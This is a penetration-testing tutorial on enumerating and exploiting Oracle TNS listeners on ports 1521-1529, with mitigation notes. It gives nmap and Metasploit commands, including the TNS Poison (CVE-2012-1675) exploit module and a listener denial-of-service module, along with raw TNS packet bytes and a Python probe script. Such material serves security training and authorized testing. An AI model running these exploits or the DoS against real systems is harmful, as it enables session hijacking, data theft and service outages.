> For the complete documentation index, see [llms.txt](https://www.verylazytech.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.verylazytech.com/network-pentesting/oracle-tns-listener-port-1521-1522-1529.md).

# Oracle TNS Listener - Port 1521,1522-1529

{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**
  {% endtab %}
  {% endtabs %}

## Basic info

Oracle databases are widely used across industries for storing sensitive enterprise data. However, their exposure to the network — especially via the Transparent Network Substrate (TNS) listener — can introduce serious security risks. Oracle TNS operates over default port **1521**, but in complex environments, you may encounter instances on **1522–1529** or even beyond. This article provides in-depth techniques for **enumerating**, **exploiting**, and **securing** Oracle TNS listeners, with real-world examples and practical commands.

***

### 1. Understanding Oracle TNS and Default Ports

**What is TNS?**

TNS (Transparent Network Substrate) is Oracle’s proprietary protocol that enables communication between Oracle clients and databases across a network. It allows connections, sessions, and commands like `CONNECT`, `DATA`, `RESOLVE`, etc., to flow through Oracle listeners.

**Default Ports**

* **1521** — Primary default listener port
* **1522–1529** — Often used for additional listeners, RAC (Real Application Clusters), or other configured services

In real-world Oracle deployments, multiple listener processes may be used for **load balancing**, **high availability**, or **segregation of duties** across applications.

***

### 2. Common Vulnerabilities in TNS Listeners

**2.1. CVE-2012–1675 — TNS Poison Attack**

**Description**: A critical vulnerability allowing attackers to **hijack database sessions** by registering rogue services with the listener.

**Impact**: MITM attacks, data exfiltration, and full control over database traffic.

**Mitigation**: Use `VALID_NODE_CHECKING_REGISTRATION = YES` and restrict registration IPs.

***

### 2.2. No Listener Authentication

Many Oracle listeners are deployed with **no password or authentication**, allowing unauthenticated attackers to:

* View service names
* Stop, start, or reload the listener
* Perform Denial-of-Service (DoS) attacks

***

### 2.3. Information Disclosure via Listener STATUS

An attacker can request a `STATUS` command to retrieve:

* Hostnames
* Service names
* Instance names
* Database version

***

### 3. Enumeration Techniques

**3.1. Nmap Scanning**

Start by identifying open ports and checking for Oracle services.

```
nmap -sV -p 1521-1529 <target_ip>
```

Use the Oracle-specific NSE script:

```
nmap -p 1521 --script oracle-tns-version <target_ip>
```

#### 3.2. Checking with Metasploit

```
msfconsole
use auxiliary/admin/oracle/tnslsnr_version
set RHOSTS <target_ip>
set RPORT 1521
run
```

Output reveals the listener version, hostname, and Oracle SID.

***

#### 3.3. Using TNSping

Oracle client installations come with `tnsping`:

```
tnsping <listener_alias>
```

Alternatively, simulate TNSping with Python or Netcat by sending crafted TNS packets.

***

#### 3.4. Manual Enumeration Using Telnet or Netcat

```
nc <target_ip> 1521
```

Send raw TNS packets:

```
\x00\x00\x00\x36\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x00\x00
```

You can script this using Python `socket` module to brute-force or enumerate SIDs.

***

### 4. Exploitation Techniques

**4.1. Exploiting TNS Poison Attack (CVE-2012–1675)**

Metasploit Module:

```
use auxiliary/admin/oracle/tnspoison
set RHOSTS <target_ip>
set RPORT 1521
run
```

**Warning**: This module may crash the listener or disrupt sessions. Use only in lab or authorized environments.

***

#### 4.2. Exploiting Unauthenticated Listener Control

If listener commands like `STATUS`, `STOP`, or `RELOAD` are unauthenticated:

```
use auxiliary/admin/oracle/tnslsnr_version
use auxiliary/admin/oracle/tnslsnr_service
```

You can perform a Denial-of-Service:

```
use auxiliary/dos/oracle/tnslsnr_dos
```

***

### **5. Custom Python Script to Enumerate Listener Services**

```
import socket
def send_tns_probe(ip, port):
    tns_pkt = b"\x00\x00\x00\x2a\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    try:
        s = socket.socket()
        s.settimeout(3)
        s.connect((ip, port))
        s.send(tns_pkt)
        response = s.recv(1024)
        print(f"[+] Response from {ip}:{port}:\n{response.hex()}")
    except Exception as e:
        print(f"[-] Failed to connect to {ip}:{port} - {str(e)}")
send_tns_probe("10.0.0.25", 1523)
```

***

{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://buymeacoffee.com/verylazytech/e/271180)

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on:
  * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
  * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
  * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
  * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
  * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
  * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**

</details>
{% endhint %}
